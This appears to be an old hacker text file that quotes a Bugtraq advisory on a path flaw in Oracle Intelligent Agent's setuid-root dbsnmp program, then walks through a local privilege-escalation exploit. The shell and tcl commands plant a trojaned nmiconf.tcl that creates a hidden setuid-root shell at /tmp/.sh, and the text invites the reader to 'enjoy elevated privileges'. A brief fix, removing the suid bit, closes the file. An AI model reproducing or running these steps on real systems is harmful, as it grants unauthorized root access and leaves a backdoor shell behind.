oracle_intelligent_agent.txt

`START OF BUGTRAQ POST  
  
Oracle installations with the 'Oracle Intelligent Agent' installed have a  
path related vulnerability. The problem lies in the dbsnmp program located  
in $ORACLE_HOME/bin . This setuid root program calls a tcl script   
(nmiconf.tcl) located by default in $ORACLE_HOME/network/agent/config. The  
problem is that the dbsnmp script relies on an environment variable (the  
path to nmiconf.tcl) which can be a set by a user. Therefore, intruders  
can force the script to execute a trojaned version of nmiconf.tcl which  
will run as root.  
  
END OF BUGTRAQ POST  
  
  
apparently, as we see from above, $ORACLE_HOME would need to be reset for  
this exploit to work properly. so lets do it.  
  
first of all, drop to a bourne or korn shell and do the following:  
-------  
  
echo "cp /bin/sh /tmp/.sh ; chmod 4755 /tmp/.sh" > /tmp/.12345  
mkdir -p /tmp/whatever/network/agent/config  
export $ORACLE_HOME=/tmp/whatever  
cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF  
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*  
set n [ system "/tmp/.12345" ]  
EOF  
  
# or even an exec call instead of system... whatever...  
  
cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF  
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*  
set n [ exec /tmp/.12345 ]  
EOF  
  
-------  
mileage may vary widely with your OS and tcl version,   
so this is merely a template of the process involved...  
however all one needs to do to make this a reality   
is run the OLD dbsnmp program and you will spawn a  
root shell in /tmp called /tmp/.sh  
execute the root shell and enjoy elevated privileges.  
  
NOW FOR THE FIX: turn OFF the suid bit on the dbsnmp executable.   
theres no reason to have it set in the first place as root should   
be the only user really to allow an SNMP paradigm to run anyways.   
duh  
  
  
" ...it takes a good man to beat me... it just doesnt take very long."  
  
.|.. ..|.  
mujahadin  
  
no extra charge for typos  
  
  
  
`